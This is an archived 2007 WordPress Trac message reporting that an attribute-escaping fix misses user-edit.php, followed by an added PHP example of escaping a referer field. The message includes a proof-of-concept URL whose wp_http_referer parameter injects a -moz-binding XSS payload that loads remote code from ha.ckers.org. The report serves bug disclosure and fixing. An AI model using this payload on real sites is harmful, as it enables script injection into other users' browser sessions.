[wp-trac] Re: [WordPress Trac] #4333: Some attribute_escape()s and
relatives for edit forms
WordPress Trac
wp-trac at lists.automattic.com
Sat May 26 05:29:04 GMT 2007
#4333: Some attribute_escape()s and relatives for edit forms
----------------------------+-----------------------------------------------
Reporter: mdawaffe | Owner: rob1n
Type: defect | Status: reopened
Priority: high | Milestone: 2.2.1
Component: Administration | Version: 2.2
Severity: normal | Resolution:
Keywords: |
----------------------------+-----------------------------------------------
Comment (by g30rg3x):
Well, I made some trunk-based patches for 2.2.
Obviously I don't add anything that has to be related with the trunk
version.

Also, I think that the trunk solution is incomplete because it doesn't filter
the user-edit.php based version of the bug:
user-edit.php?user_id=1&wp_http_referer=%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'
--
Ticket URL: <http://trac.wordpress.org/ticket/4333#comment:8>
WordPress Trac <http://trac.wordpress.org/>
WordPress blogging software
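
An added illustration, not part of the original message and not WordPress code: it shows why a request value such as wp_http_referer has to be attribute-escaped before it is echoed into a quoted form attribute. The hidden field and the helper names are hypothetical, and htmlspecialchars() stands in for attribute_escape().

```php
<?php
// Hypothetical stand-in for WordPress's attribute_escape(): encode the
// characters that can terminate a quoted attribute value or open a tag.
function escape_attribute(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Hypothetical hidden field carrying the referer back through an edit form.
// $escape = false is the "before" behaviour, true is the fixed behaviour.
function render_field(string $referer, bool $escape): string {
    $value = $escape ? escape_attribute($referer) : $referer;
    return '<input type="hidden" name="wp_http_referer" value="' . $value . '" />';
}

// Split the rendered tag into what sits inside value="..." and whatever
// spilled out of it into the rest of the tag.
function split_value_attribute(string $html): array {
    preg_match('/ value="([^"]*)"(.*?) \/>$/s', $html, $m);
    return [
        'value' => html_entity_decode($m[1], ENT_QUOTES, 'UTF-8'),
        'spill' => $m[2],
    ];
}

// Query string taken from the URL in the comment above, decoded the way PHP
// decodes request parameters.
$query = "user_id=1&wp_http_referer=%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'";
parse_str($query, $params);
$referer = $params['wp_http_referer'];

foreach ([false, true] as $escape) {
    $parts = split_value_attribute(render_field($referer, $escape));
    printf(
        "escaped=%s value_round_trips=%s spilled_markup=%s\n",
        var_export($escape, true),
        var_export($parts['value'] === $referer, true),
        var_export($parts['spill'], true)
    );
}
```

With escaping off, the value attribute comes back empty and the rest of the parameter is reported as spilled markup inside the tag; with escaping on, the whole parameter stays inside value and nothing spills.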